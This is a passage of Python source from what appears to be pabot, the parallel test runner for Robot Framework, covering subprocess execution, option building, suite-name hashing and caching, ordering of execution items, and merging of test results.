timestamp=timestamp,
)
else:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING %s" % item_name,
timestamp=timestamp,
)
return process, _wait_for_return_code(process, item_name, pool_id, item_index)
def _wait_for_return_code(process, item_name, pool_id, item_index):
rc = None
elapsed = 0
ping_time = ping_interval = 150
while rc is None:
rc = process.poll()
time.sleep(0.1)
elapsed += 1
if elapsed == ping_time:
ping_interval += 50
ping_time += ping_interval
_write_with_id(
process,
pool_id,
item_index,
"still running %s after %s seconds" % (item_name, elapsed / 10.0),
)
return rc, elapsed / 10.0
def _read_file(file_handle):
try:
with open(file_handle.name, "r") as content_file:
content = content_file.read()
return content
except:
return "Unable to read file %s" % file_handle
def _execution_failed_message(suite_name, stdout, stderr, rc, verbose):
if not verbose:
return "FAILED %s" % suite_name
return "Execution failed in %s with %d failing test(s)\n%s\n%s" % (
suite_name,
rc,
_read_file(stdout),
_read_file(stderr),
)
def _execution_passed_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "PASSED %s in %s seconds" % (suite_name, elapsed)
return "PASSED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _execution_ignored_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "IGNORED %s" % suite_name
return "IGNORED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _options_for_custom_executor(*args):
# type: (Any) -> List[str]
return _options_to_cli_arguments(_options_for_executor(*args))
def _options_for_executor(
options,
outs_dir,
execution_item,
argfile,
caller_id,
is_last,
queueIndex,
last_level,
processes,
):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["test"] = options.get("test", [])[:]
options["suite"] = options.get("suite", [])[:]
execution_item.modify_options_for_executor(options)
options["outputdir"] = "%OUTPUTDIR%" if execution_item.type == "hived" else outs_dir
options["variable"] = options.get("variable", [])[:]
options["variable"].append("CALLER_ID:%s" % caller_id)
pabotLibURIVar = "PABOTLIBURI:%s" % _PABOTLIBURI
# Prevent multiple appending of PABOTLIBURI variable setting
if pabotLibURIVar not in options["variable"]:
options["variable"].append(pabotLibURIVar)
pabotExecutionPoolId = "PABOTEXECUTIONPOOLID:%d" % _make_id()
if pabotExecutionPoolId not in options["variable"]:
options["variable"].append(pabotExecutionPoolId)
pabotIsLast = "PABOTISLASTEXECUTIONINPOOL:%s" % ("1" if is_last else "0")
if pabotIsLast not in options["variable"]:
options["variable"].append(pabotIsLast)
pabotProcesses = "PABOTNUMBEROFPROCESSES:%s" % str(processes)
if pabotProcesses not in options["variable"]:
options["variable"].append(pabotProcesses)
pabotIndex = pabotlib.PABOT_QUEUE_INDEX + ":" + str(queueIndex)
if pabotIndex not in options["variable"]:
options["variable"].append(pabotIndex)
if last_level is not None:
pabotLastLevel = pabotlib.PABOT_LAST_LEVEL + ":" + str(last_level)
if pabotLastLevel not in options["variable"]:
options["variable"].append(pabotLastLevel)
if argfile:
_modify_options_for_argfile_use(argfile, options, execution_item.top_name())
options["argumentfile"] = argfile
return _set_terminal_coloring_options(options)
def _modify_options_for_argfile_use(argfile, options, root_name):
argfile_opts, _ = ArgumentParser(
USAGE,
auto_pythonpath=False,
auto_argumentfile=True,
env_options="ROBOT_OPTIONS",
).parse_args(["--argumentfile", argfile])
old_name = options.get("name", root_name)
if argfile_opts["name"]:
new_name = argfile_opts["name"]
_replace_base_name(new_name, old_name, options, "suite")
if not options["suite"]:
_replace_base_name(new_name, old_name, options, "test")
if "name" in options:
del options["name"]
def _replace_base_name(new_name, old_name, options, key):
if isinstance(options.get(key, None), str):
options[key] = new_name + options[key][len(old_name) :]
elif key in options:
options[key] = [new_name + s[len(old_name) :] for s in options.get(key, [])]
def _set_terminal_coloring_options(options):
if ROBOT_VERSION >= "2.9":
options["consolecolors"] = "off"
options["consolemarkers"] = "off"
else:
options["monitorcolors"] = "off"
if ROBOT_VERSION >= "2.8" and ROBOT_VERSION < "2.9":
options["monitormarkers"] = "off"
return options
def _options_to_cli_arguments(opts): # type: (dict) -> List[str]
res = [] # type: List[str]
for k, v in opts.items():
if isinstance(v, str):
res += ["--" + str(k), str(v)]
elif PY2 and is_unicode(v):
res += ["--" + str(k), v.encode("utf-8")]
elif isinstance(v, bool) and (v is True):
res += ["--" + str(k)]
elif isinstance(v, list):
for value in v:
if PY2 and is_unicode(value):
res += ["--" + str(k), value.encode("utf-8")]
else:
res += ["--" + str(k), str(value)]
return res
def _group_by_groups(tokens):
result = []
group = None
for token in tokens:
if isinstance(token, GroupStartItem):
if group is not None:
raise DataError(
"Ordering: Group can not contain a group. Encoutered '{'"
)
group = GroupItem()
result.append(group)
continue
if isinstance(token, GroupEndItem):
if group is None:
raise DataError(
"Ordering: Group end tag '}' encountered before start '{'"
)
group = None
continue
if group is not None:
group.add(token)
else:
result.append(token)
return result
def hash_directory(digest, path):
if os.path.isfile(path):
digest.update(_digest(_norm_path(path)))
get_hash_of_file(path, digest)
return
for root, _, files in os.walk(path):
for name in sorted(files):
file_path = os.path.join(root, name)
if os.path.isfile(file_path) and any(
file_path.endswith(p) for p in _ROBOT_EXTENSIONS
):
# DO NOT ALLOW CHANGE TO FILE LOCATION
digest.update(_digest(_norm_path(root)))
# DO THESE IN TWO PHASES BECAUSE SEPARATOR DIFFERS IN DIFFERENT OS
digest.update(_digest(name))
get_hash_of_file(file_path, digest)
def _norm_path(path):
return "/".join(os.path.normpath(path).split(os.path.sep))
def _digest(text):
text = text.decode("utf-8") if PY2 and not is_unicode(text) else text
return hashlib.sha1(text.encode("utf-8")).digest()
def get_hash_of_file(filename, digest):
if not os.path.isfile(filename):
return
with open(filename, "rb") as f_obj:
while True:
buf = f_obj.read(1024 * 1024)
if not buf:
break
digest.update(buf)
def get_hash_of_dirs(directories):
digest = hashlib.sha1()
for directory in directories:
hash_directory(digest, directory)
return digest.hexdigest()
IGNORED_OPTIONS = [
"pythonpath",
"outputdir",
"output",
"log",
"report",
"removekeywords",
"flattenkeywords",
"tagstatinclude",
"tagstatexclude",
"tagstatcombine",
"critical",
"noncritical",
"tagstatlink",
"metadata",
"tagdoc",
]
def get_hash_of_command(options, pabot_args):
digest = hashlib.sha1()
hopts = dict(options)
for option in options:
if option in IGNORED_OPTIONS or options[option] == []:
del hopts[option]
if pabot_args.get("testlevelsplit"):
hopts["testlevelsplit"] = True
digest.update(repr(sorted(hopts.items())).encode("utf-8"))
return digest.hexdigest()
Hashes = namedtuple("Hashes", ["dirs", "cmd", "suitesfrom"])
def _suitesfrom_hash(pabot_args):
if "suitesfrom" in pabot_args:
digest = hashlib.sha1()
get_hash_of_file(pabot_args["suitesfrom"], digest)
return digest.hexdigest()
else:
return "no-suites-from-option"
if PY2:
def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode)
else:
def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode, encoding="utf-8")
def solve_suite_names(outs_dir, datasources, options, pabot_args):
h = Hashes(
dirs=get_hash_of_dirs(datasources),
cmd=get_hash_of_command(options, pabot_args),
suitesfrom=_suitesfrom_hash(pabot_args),
)
try:
if not os.path.isfile(".pabotsuitenames"):
suite_names = generate_suite_names(
outs_dir, datasources, options, pabot_args
)
store_suite_names(h, suite_names)
return suite_names
with _open_pabotsuitenames("r") as suitenamesfile:
lines = [line.strip() for line in suitenamesfile.readlines()]
corrupted = len(lines) < 5
file_h = None # type: Optional[Hashes]
file_hash = None # type: Optional[str]
hash_of_file = None # type: Optional[str]
if not corrupted:
file_h = Hashes(
dirs=lines[0][len("datasources:") :],
cmd=lines[1][len("commandlineoptions:") :],
suitesfrom=lines[2][len("suitesfrom:") :],
)
file_hash = lines[3][len("file:") :]
hash_of_file = _file_hash(lines)
corrupted = corrupted or any(
not l.startswith("--suite ")
and not l.startswith("--test ")
and l != "#WAIT"
and l != "{"
and l != "}"
for l in lines[4:]
)
execution_item_lines = [parse_execution_item_line(l) for l in lines[4:]]
if corrupted or h != file_h or file_hash != hash_of_file:
return _regenerate(
file_h,
h,
pabot_args,
outs_dir,
datasources,
options,
execution_item_lines,
)
return execution_item_lines
except IOError:
return _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
def _levelsplit(
suites, pabot_args
): # type: (List[SuiteItem], Dict[str, str]) -> List[ExecutionItem]
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def _group_by_wait(lines):
suites = [[]] # type: List[List[ExecutionItem]]
for suite in lines:
if not suite.isWait:
if suite:
suites[-1].append(suite)
else:
suites.append([])
return suites
def _regenerate(
file_h, h, pabot_args, outs_dir, datasources, options, lines
): # type: (Optional[Hashes], Hashes, Dict[str, str], str, List[str], Dict[str, str], List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in lines)
if (
(file_h is None or file_h.suitesfrom != h.suitesfrom)
and "suitesfrom" in pabot_args
and os.path.isfile(pabot_args["suitesfrom"])
):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
if file_h is None or file_h.dirs != h.dirs:
all_suites = generate_suite_names_with_builder(
outs_dir, datasources, options
)
else:
all_suites = [suite for suite in lines if suite]
suites = _preserve_order(all_suites, suites)
else:
suites = _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
suites = _preserve_order(suites, [suite for suite in lines if suite])
if suites:
store_suite_names(h, suites)
assert all(isinstance(s, ExecutionItem) for s in suites)
return suites
def _contains_suite_and_test(suites):
return any(isinstance(s, SuiteItem) for s in suites) and any(
isinstance(t, TestItem) for t in suites
)
def _preserve_order(new_items, old_items):
assert all(isinstance(s, ExecutionItem) for s in new_items)
assert all(isinstance(s, ExecutionItem) for s in old_items)
old_contains_tests = any(isinstance(t, TestItem) for t in old_items)
old_contains_suites = any(isinstance(s, SuiteItem) for s in old_items)
old_items = _fix_items(old_items)
new_contains_tests = any(isinstance(t, TestItem) for t in new_items)
if old_contains_tests and old_contains_suites and not new_contains_tests:
new_items = _split_partially_to_tests(new_items, old_items)
# TODO: Preserving order when suites => tests OR tests => suites
preserve, ignorable = _get_preserve_and_ignore(
new_items, old_items, old_contains_tests and old_contains_suites
)
exists_in_old_and_new = [
s for s in old_items if (s in new_items and s not in ignorable) or s in preserve
]
exists_only_in_new = [
s for s in new_items if s not in old_items and s not in ignorable
]
return _fix_items(exists_in_old_and_new + exists_only_in_new)
def _fix_items(items): # type: (List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in items)
to_be_removed = [] # type: List[int]
for i in range(len(items)):
for j in range(i + 1, len(items)):
if items[i].contains(items[j]):
to_be_removed.append(j)
items = [item for i, item in enumerate(items) if i not in to_be_removed]
result = [] # type: List[ExecutionItem]
to_be_splitted = {} # type: Dict[int, List[ExecutionItem]]
for i in range(len(items)):
if i in to_be_splitted:
result.extend(items[i].difference(to_be_splitted[i]))
else:
result.append(items[i])
for j in range(i + 1, len(items)):
if items[j].contains(items[i]):
if j not in to_be_splitted:
to_be_splitted[j] = []
to_be_splitted[j].append(items[i])
_remove_double_waits(result)
_remove_empty_groups(result)
if result and result[0].isWait:
result = result[1:]
if result and result[-1].isWait:
result = result[:-1]
return result
def _get_preserve_and_ignore(new_items, old_items, old_contains_suites_and_tests):
ignorable = []
preserve = []
for old_item in old_items:
for new_item in new_items:
if (
old_item.contains(new_item)
and new_item != old_item
and (isinstance(new_item, SuiteItem) or old_contains_suites_and_tests)
):
preserve.append(old_item)
ignorable.append(new_item)
if (
old_item.isWait
or isinstance(old_item, GroupStartItem)
or isinstance(old_item, GroupEndItem)
):
preserve.append(old_item)
preserve = [
new_item
for new_item in preserve
if not any([i.contains(new_item) and i != new_item for i in preserve])
]
return preserve, ignorable
def _remove_double_waits(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
doubles = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if j.isWait and k == j:
doubles.append(i)
for i in reversed(doubles):
del exists_in_old_and_new[i]
def _remove_empty_groups(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
removables = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if isinstance(j, GroupStartItem) and isinstance(k, GroupEndItem):
removables.extend([i, i + 1])
for i in reversed(removables):
del exists_in_old_and_new[i]
def _split_partially_to_tests(
new_suites, old_suites
): # type: (List[SuiteItem], List[ExecutionItem]) -> List[ExecutionItem]
suits = [] # type: List[ExecutionItem]
for s in new_suites:
split = False
for old_test in old_suites:
if isinstance(old_test, TestItem) and s.contains(old_test):
split = True
if split:
suits.extend(s.tests)
else:
suits.append(s)
return suits
def _file_hash(lines):
digest = hashlib.sha1()
digest.update(lines[0].encode())
digest.update(lines[1].encode())
digest.update(lines[2].encode())
hashes = 0
for line in lines[4:]:
if line not in ("#WAIT", "{", "}"):
line = line.decode("utf-8") if PY2 else line
hashes ^= int(hashlib.sha1(line.encode("utf-8")).hexdigest(), 16)
digest.update(str(hashes).encode())
return digest.hexdigest()
def store_suite_names(hashes, suite_names):
# type: (Hashes, List[ExecutionItem]) -> None
assert all(isinstance(s, ExecutionItem) for s in suite_names)
suite_lines = [s.line() for s in suite_names]
_write("Storing .pabotsuitenames file")
try:
with _open_pabotsuitenames("w") as suitenamesfile:
suitenamesfile.write("datasources:" + hashes.dirs + "\n")
suitenamesfile.write("commandlineoptions:" + hashes.cmd + "\n")
suitenamesfile.write("suitesfrom:" + hashes.suitesfrom + "\n")
suitenamesfile.write(
"file:"
+ _file_hash(
[
"datasources:" + hashes.dirs,
"commandlineoptions:" + hashes.cmd,
"suitesfrom:" + hashes.suitesfrom,
None,
]
+ suite_lines
)
+ "\n"
)
suitenamesfile.writelines(
(d + "\n").encode("utf-8") if PY2 and is_unicode(d) else d + "\n"
for d in suite_lines
)
except IOError:
_write(
"[ "
+ _wrap_with(Color.YELLOW, "WARNING")
+ " ]: storing .pabotsuitenames failed"
)
def generate_suite_names(
outs_dir, datasources, options, pabot_args
): # type: (object, object, object, Dict[str, str]) -> List[ExecutionItem]
suites = [] # type: List[SuiteItem]
if "suitesfrom" in pabot_args and os.path.isfile(pabot_args["suitesfrom"]):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
else:
suites = generate_suite_names_with_builder(outs_dir, datasources, options)
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def generate_suite_names_with_builder(outs_dir, datasources, options):
opts = _options_for_dryrun(options, outs_dir)
settings = RobotSettings(opts)
builder = TestSuiteBuilder(
settings["SuiteNames"], settings.extension, rpa=settings.rpa
)
suite = builder.build(*datasources)
settings.rpa = builder.rpa
suite.configure(**settings.suite_config)
if settings.pre_run_modifiers:
_write.error = _write
suite.visit(
ModelModifier(settings.pre_run_modifiers, settings.run_empty_suite, _write)
)
all_suites = (
get_all_suites_from_main_suite(suite.suites) if suite.suites else [suite]
)
suite_names = [
SuiteItem(
suite.longname,
tests=[test.longname for test in suite.tests],
suites=suite.suites,
)
for suite in all_suites
]
if not suite_names and not options.get("runemptysuite", False):
stdout_value = opts["stdout"].getvalue()
if stdout_value:
_write(
"[STDOUT] from suite search:\n" + stdout_value + "[STDOUT] end",
Color.YELLOW,
)
stderr_value = opts["stderr"].getvalue()
if stderr_value:
_write(
"[STDERR] from suite search:\n" + stderr_value + "[STDERR] end",
Color.RED,
)
return list(sorted(set(suite_names)))
def get_all_suites_from_main_suite(suites):
all_suites = []
for suite in suites:
if suite.suites:
all_suites.extend(get_all_suites_from_main_suite(suite.suites))
else:
all_suites.append(suite)
return all_suites
class SuiteNotPassingsAndTimes(ResultVisitor):
def __init__(self):
self.suites = [] # type: List[Tuple[bool, int, str]]
def start_suite(self, suite):
if len(suite.tests) > 0:
self.suites.append((not suite.passed, suite.elapsedtime, suite.longname))
def _suites_from_outputxml(outputxml):
res = ExecutionResult(outputxml)
suite_times = SuiteNotPassingsAndTimes()
res.visit(suite_times)
return [SuiteItem(suite) for (_, _, suite) in reversed(sorted(suite_times.suites))]
def _options_for_dryrun(options, outs_dir):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["variable"] = options.get("variable", [])[:]
options["variable"].append(pabotlib.PABOT_QUEUE_INDEX + ":-1")
if ROBOT_VERSION >= "2.8":
options["dryrun"] = True
else:
options["runmode"] = "DryRun"
options["output"] = "suite_names.xml"
# --timestampoutputs is not compatible with hard-coded suite_names.xml
options["timestampoutputs"] = False
options["outputdir"] = outs_dir
if PY2:
options["stdout"] = BytesIO()
options["stderr"] = BytesIO()
else:
options["stdout"] = StringIO()
options["stderr"] = StringIO()
options["listener"] = []
return _set_terminal_coloring_options(options)
def _options_for_rebot(options, start_time_string, end_time_string):
rebot_options = options.copy()
rebot_options["starttime"] = start_time_string
rebot_options["endtime"] = end_time_string
rebot_options["monitorcolors"] = "off"
rebot_options["suite"] = []
rebot_options["test"] = []
rebot_options["exclude"] = []
rebot_options["include"] = []
if ROBOT_VERSION >= "2.8":
options["monitormarkers"] = "off"
return rebot_options
def _now():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
def _print_elapsed(start, end):
_write(
"Total testing: "
+ _time_string(sum(_ALL_ELAPSED))
+ "\nElapsed time: "
+ _time_string(end - start)
)
def _time_string(elapsed):
millis = int((elapsed * 100) % 100)
seconds = int(elapsed) % 60
elapsed_minutes = (int(elapsed) - seconds) / 60
minutes = elapsed_minutes % 60
elapsed_hours = (elapsed_minutes - minutes) / 60
elapsed_string = ""
if elapsed_hours > 0:
plural = ""
if elapsed_hours > 1:
plural = "s"
elapsed_string += ("%d hour" % elapsed_hours) + plural + " "
if minutes > 0:
plural = ""
if minutes > 1:
plural = "s"
elapsed_string += ("%d minute" % minutes) + plural + " "
return elapsed_string + "%d.%d seconds" % (seconds, millis)
def keyboard_interrupt(*args):
global CTRL_C_PRESSED
CTRL_C_PRESSED = True
def _parallel_execute(items, processes):
original_signal_handler = signal.signal(signal.SIGINT, keyboard_interrupt)
pool = ThreadPool(processes)
result = pool.map_async(execute_and_wait_with, items, 1)
pool.close()
while not result.ready():
# keyboard interrupt is executed in main thread
# and needs this loop to get time to get executed
try:
time.sleep(0.1)
except IOError:
keyboard_interrupt()
signal.signal(signal.SIGINT, original_signal_handler)
def _output_dir(options, cleanup=True):
outputdir = options.get("outputdir", ".")
outpath = os.path.join(outputdir, "pabot_results")
if cleanup and os.path.isdir(outpath):
shutil.rmtree(outpath)
return outpath
def _copy_output_artifacts(options, file_extensions=None, include_subfolders=False):
file_extensions = file_extensions or ["png"]
pabot_outputdir = _output_dir(options, cleanup=False)
outputdir = options.get("outputdir", ".")
copied_artifacts = []
for location, _, file_names in os.walk(pabot_outputdir):
for file_name in file_names:
file_ext = file_name.split(".")[-1]
if file_ext in file_extensions:
rel_path = os.path.relpath(location, pabot_outputdir)
prefix = rel_path.split(os.sep)[0] # folders named "process-id"
dst_folder_path = outputdir
# if it is a file from sub-folders of "location"
if os.sep in rel_path:
if not include_subfolders:
continue
# create destination sub-folder
subfolder_path = rel_path[rel_path.index(os.sep) + 1 :]
dst_folder_path = os.path.join(outputdir, subfolder_path)
if not os.path.isdir(dst_folder_path):
os.makedirs(dst_folder_path)
dst_file_name = "-".join([prefix, file_name])
shutil.copyfile(
os.path.join(location, file_name),
os.path.join(dst_folder_path, dst_file_name),
)
copied_artifacts.append(file_name)
return copied_artifacts
def _report_results(outs_dir, pabot_args, options, start_time_string, tests_root_name):
if ROBOT_VERSION < "4.0":
stats = {
"critical": {"total": 0, "passed": 0, "failed": 0},
"all": {"total": 0, "passed": 0, "failed": 0},
}
else:
stats = {
"total": 0,
"passed": 0,
"failed": 0,
"skipped": 0,
}
if pabot_args["argumentfiles"]:
outputs = [] # type: List[str]
for index, _ in pabot_args["argumentfiles"]:
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
outputs += [
_merge_one_run(
os.path.join(outs_dir, index),
options,
tests_root_name,
stats,
copied_artifacts,
outputfile=os.path.join("pabot_results", "output%s.xml" % index),
)
]
if "output" not in options:
options["output"] = "output.xml"
_write_stats(stats)
return rebot(*outputs, **_options_for_rebot(options, start_time_string, _now()))
else:
return _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
)
def _write_stats(stats):
if ROBOT_VERSION < "4.0":
crit = stats["critical"]
al = stats["all"]
_write(
"%d critical tests, %d passed, %d failed"
% (crit["total"], crit["passed"], crit["failed"])
)
_write(
"%d tests total, %d passed, %d failed"
% (al["total"], al["passed"], al["failed"])
)
else:
_write(
"%d tests, %d passed, %d failed, %d skipped."
% (stats["total"], stats["passed"], stats["failed"], stats["skipped"])
)
_write("===================================================")
def _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
):
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
output_path = _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts
)
_write_stats(stats)
if (
"report" in options
and options["report"] == "NONE"
and "log" in options
and options["log"] == "NONE"
):
options[
"output"
] = output_path # REBOT will return error 252 if nothing is written
else:
_write("Output: %s" % output_path)
options["output"] = None # Do not write output again with rebot
return rebot(output_path, **_options_for_rebot(options, start_time_string, _now()))
def _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts, outputfile=None
):
outputfile = outputfile or options.get("output", "output.xml")
output_path = os.path.abspath(
os.path.join(options.get("outputdir", "."), outputfile)
)
files = sorted(glob(os.path.join(_glob_escape(outs_dir), "**/*.xml")))
if not files:
_write('WARN: No output files in "%s"' % outs_dir, Color.YELLOW)
return ""
def invalid_xml_callback():
global _ABNORMAL_EXIT_HAPPENED
_ABNORMAL_EXIT_HAPPENED = True
if PY2:
files = [f.decode(SYSTEM_ENCODING) if not is_unicode(f) else f for f in files]
resu = merge(
files, options, tests_root_name, copied_artifacts, invalid_xml_callback
)
_update_stats(resu, stats)
resu.save(output_path)
return output_path
def _update_stats(result, stats):
s = result.statistics
if ROBOT_VERSION < "4.0":
stats["critical"]["total"] += s.total.critical.total
stats["critical"]["passed"] += s.total.critical.passed
stats["critical"]["failed"] += s.total.critical.failed
stats["all"]["total"] += s.total.all.total
stats["all"]["passed"] += s.total.all.passed
stats["all"]["failed"] += s.total.all.failed
else:
stats["total"] += s.total.total
stats["passed"] += s.total.passed
stats["failed"] += s.total.failed
stats["skipped"] += s.total.skipped
# This is from https://github.com/django/django/blob/master/django/utils/glob.py
_magic_check = re.compile("([*?[])")
def _glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
pathname = _magic_check.sub(r"[\1]", pathname)
return drive + pathname
def _writer():
while True:
message = MESSAGE_QUEUE.get()
if message is None:
MESSAGE_QUEUE.task_done()
return
print(message)
sys.stdout.flush()
MESSAGE_QUEUE.task_done()
def _write(message, color=None):
MESSAGE_QUEUE.put(_wrap_with(color, message))
def _wrap_with(color, message):
if _is_output_coloring_supported() and color:
return "%s%s%s" % (color, message, Color.ENDC)
return message
def _is_output_coloring_supported():
return sys.stdout.isatty() and os.name in Color.SUPPORTED_OSES
def _start_message_writer():
t = threading.Thread(target=_writer)
t.start()
def _stop_message_writer():
MESSAGE_QUEUE.put(None)
MESSAGE_QUEUE.join()
def _get_free_port(pabot_args):
if pabot_args["pabotlibport"] != 0:
return pabot_args["pabotlibport"]
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("localhost", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def _start_remote_library(pabot_args): # type: (dict) -> Optional[subprocess.Popen]
global _PABOTLIBURI
free_port = _get_free_port(pabot_args)
_PABOTLIBURI = "%s:%s" % (pabot_args["pabotlibhost"], free_port)
if not pabot_args["pabotlib"]:
return None
if pabot_args.get("resourcefile") and not os.path.exists(
pabot_args["resourcefile"]
):
_write(
"Warning: specified resource file doesn't exist."
" Some tests may fail or continue forever.",
Color.YELLOW,
)
pabot_args["resourcefile"] = None
return subprocess.Popen(
'"{python}" -m {pabotlibname} {resourcefile} {pabotlibhost} {pabotlibport}'.format(
python=sys.executable,
pabotlibname=pabotlib.__name__,
resourcefile=pabot_args.get("resourcefile"),
pabotlibhost=pabot_args["pabotlibhost"],
pabotlibport=free_port,
),
shell=True,
)
def _stop_remote_library(process): # type: (subprocess.Popen) -> None
_write("Stopping PabotLib process")
try:
remoteLib = Remote(_PABOTLIBURI)
remoteLib.run_keyword("stop_remote_libraries", [], {})
remoteLib.run_keyword("stop_remote_server", [], {})
except RuntimeError:
_write("Could not connect to PabotLib - assuming stopped already")
return
i = 50
while i > 0 and process.poll() is None:
time.sleep(0.1)
i -= 1
if i == 0:
_write(
"Could not stop PabotLib Process in 5 seconds " "- calling terminate",
Color.YELLOW,
)
process.terminate()
else:
_write("PabotLib process stopped")
def _get_suite_root_name(suite_names):
top_names = [x.top_name() for group in suite_names for x in group]
if top_names and top_names.count(top_names[0]) == len(top_names):
return top_names[0]
return ""
class QueueItem(object):
_queue_index = 0
def __init__(
self,
datasources,
outs_dir,
options,
execution_item,
command,
verbose,
argfile,
hive=None,
processes=0,
):
# type: (List[str], str, Dict[str, object], ExecutionItem, List[str], bool, Tuple[str, Optional[str]], Optional[str], int) -> None
self.datasources = datasources
self.outs_dir = (
outs_dir.encode("utf-8") if PY2 and is_unicode(outs_dir) else outs_dir
)
self.options = options
self.execution_item = (
execution_item if not hive else HivedItem(execution_item, hive)
)
self.command = command
self.verbose = verbose
self.argfile_index = argfile[0]
self.argfile = argfile[1]
self._index = QueueItem._queue_index
QueueItem._queue_index += 1
self.last_level = None
self.hive = hive
self.processes = processes
@property
def index(self):
# type: () -> int
return self._index
@property
def display_name(self):
# type: () -> str
if self.argfile:
return "%s {%s}" % (self.execution_item.name, self.argfile)
return self.execution_item.name
def _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
is_dry_run = (
options.get("dryrun")
if ROBOT_VERSION >= "2.8"
else options.get("runmode") == "DryRun"
)
if is_dry_run:
all_items = _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
)
else:
all_items = _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
_construct_index_and_completed_index(all_items)
_construct_last_levels(all_items)
return all_items
def _construct_index_and_completed_index(all_items):
# type: (List[List[QueueItem]]) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
for item_group in all_items:
for item in item_group:
_NOT_COMPLETED_INDEXES.append(item.index)
def _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
for suite_group in suite_names:
# TODO: Fix this better
if (
options.get("randomize") in ["all", "suites"]
and "suitesfrom" not in pabot_args
):
random.shuffle(suite_group)
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
all_items.append(items)
return all_items
def _create_items(datasources, opts_for_run, outs_dir, pabot_args, suite_group):
return [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
argfile,
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
for argfile in pabot_args["argumentfiles"] or [("", None)]
]
def _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
processes_count = pabot_args["processes"]
for suite_group in suite_names:
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
chunk_size = (
round(len(items) / processes_count)
if len(items) > processes_count
else len(items)
)
chunked_items = list(_chunk_items(items, chunk_size))
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(chunked_items)
all_items.append(chunked_items)
return all_items
def _chunk_items(items, chunk_size):
for i in range(0, len(items), chunk_size):
chunked_items = items[i : i + chunk_size]
base_item = chunked_items[0]
if not base_item:
continue
execution_items = SuiteItems([item.execution_item for item in chunked_items])
chunked_item = QueueItem(
base_item.datasources,
base_item.outs_dir,
base_item.options,
execution_items,
base_item.command,
base_item.verbose,
(base_item.argfile_index, base_item.argfile),
processes=base_item.processes,
)
yield chunked_item
def _find_ending_level(name, group):
n = name.split(".")
level = -1
for other in group:
o = other.split(".")
dif = [i for i in range(min(len(o), len(n))) if o[i] != n[i]]
if dif:
level = max(dif[0], level)
else:
return name + ".PABOT_noend"
return ".".join(n[: (level + 1)])
def _construct_last_levels(all_items):
names = []
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
names.append(suite.name)
else:
names.append(item.execution_item.name)
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
item.last_level = _find_ending_level(
suite.name, names[item.index + 1 :]
)
else:
item.last_level = _find_ending_level(
item.execution_item.name, names[item.index + 1 :]
)
def _initialize_queue_index():
global _PABOTLIBURI
plib = Remote(_PABOTLIBURI)
# INITIALISE PARALLEL QUEUE MIN INDEX
for i in range(300):
try:
plib.run_keyword(
"set_parallel_value_for_key",
